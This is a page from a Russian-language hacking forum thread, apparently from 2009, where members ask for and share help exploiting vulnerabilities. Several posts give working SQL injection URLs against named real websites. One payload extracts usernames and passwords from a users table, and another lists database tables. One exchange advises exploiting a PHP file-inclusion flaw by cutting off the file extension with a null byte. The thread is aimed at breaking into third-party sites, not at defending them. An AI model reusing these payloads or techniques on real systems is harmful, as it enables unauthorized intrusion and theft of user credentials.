FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 761 из 2422

761

Опции темы

Поиск в этой теме

Опции просмотра

16.06.2009, 16:16

R1dex

Участник форума

Регистрация: 17.09.2008

Сообщений: 211

Провел на форуме:
1571865

Репутация: 571

Отправить сообщение для R1dex с помощью ICQ

Цитата:

Сообщение от AlexSatter

4-ый мускул
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+sub string(version(),1,1)=4

p.s. раскручивайте её как слепую, имхо.

Подзапросами, которых в этой версии нету?

Попробуй покрутить скуль в другом месте.

Последний раз редактировалось R1dex; 16.06.2009 в 16:20..

16.06.2009, 14:52

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

Провел на форуме:
791766

Репутация: 61

PHP код:


		
			
if (!IsSet($t)&!IsSet($f))

    {

    $f="main";

    $filename=$f . ".php";

    }

    else

        {

        if (IsSet($t)&!IsSet($f))

            {

            $filename=$t . "/index.php";

            }

        if (IsSet($t)&IsSet($f))

            {

            $filename= $t . "/" . $f . ".php";

            }

        if (!IsSet($t)&IsSet($f))

            {

            $filename=$f . ".php";

            }

}

if (file_exists("$filename"))

{ include("$filename"); }

else

{ echo " <div class=\"alert\">  404,   . </div>"; }

Можно ли в такое инъекцию провести и как?

16.06.2009, 14:57

AlexSatter

Постоянный

Регистрация: 29.01.2009

Сообщений: 333

Провел на форуме:
1168802

Репутация: 298

насколько позволяет моя квалификация... в этом коде возможна php-inj
защиты тут в общем-то никакой нет.

расширение отбрасывайте с помощью null-byte либо с помощью усечения...

Последний раз редактировалось AlexSatter; 16.06.2009 в 15:12..

16.06.2009, 15:06

Iceangel_

Постоянный

Регистрация: 09.07.2006

Сообщений: 553

Провел на форуме:
7561206

Репутация: 1861

2 Byrger
ты же уже задавал этот вопрос, не доходчиво объяснили?
https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40

16.06.2009, 21:09

Byrger

Постоянный

Регистрация: 07.03.2008

Сообщений: 479

Провел на форуме:
791766

Репутация: 61

Цитата:

Сообщение от Iceangel_

2 Byrger
ты же уже задавал этот вопрос, не доходчиво объяснили?
https://forum.antichat.net/printthread.php?t=46016&page=185&pp=40

Не проходит я же написал помойму

16.06.2009, 22:12

jecka3000

Постоянный

Регистрация: 15.03.2008

Сообщений: 441

Провел на форуме:
2052341

Репутация: 95

подскажите плиз как дораскрутить....4* всегда вызывает у меня проблемы..., если можно, то с небольшими разъяснениями( Ососбенно как подобрать имена таблиц и колонок) вот до чего дошел я(до принтаьельной колонке):

http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,5,6,7--

16.06.2009, 22:22

Adm1n4eG

Познающий

Регистрация: 27.03.2009

Сообщений: 40

Провел на форуме:
1191962

Репутация: 39

http://www.gsl.ru/publicate/pub_content.php?id=-1+union+select+1,2,3,4,concat_ws(char(58),username ,password),6,7+from+users--

дальше сам подбирай другие колонки и таблици...

Последний раз редактировалось Adm1n4eG; 16.06.2009 в 22:28..

16.06.2009, 23:29

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Код:

ttp://times.ua/search/results/?keyword=1'

Это инъекция?

16.06.2009, 23:51

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

Провел на форуме:
14324684

Репутация: 3908

Цитата:

Сообщение от mailbrush

Код:

ttp://times.ua/search/results/?keyword=1'

Это инъекция?

Да

Код:

http://times.ua/search/results/?keyword=1'+and+1=2+union+select+1,2,3,table_name+from+information_schema.tables--+

5 ветка и вывод очень удобный, вся инфа сразу на одной странице.

__________________
Feci, quod potui. Faciant meliora potentes.

Последний раз редактировалось Ded MustD!e; 16.06.2009 в 23:55..

#10

17.06.2009, 09:43

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Цитата:

Сообщение от Ded MustD!e

Да

Код:

http://times.ua/search/results/?keyword=1'+and+1=2+union+select+1,2,3,table_name+from+information_schema.tables--+

5 ветка и вывод очень удобный, вся инфа сразу на одной странице.

Спасибо. Я пробовал подставлять так - http://times.ua/search/results/?keyword=1'/*, т.е. отсечь все лишнее, но ошибка выводилась, поэтому и не подбирал.

Страница 761 из 2422

761

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ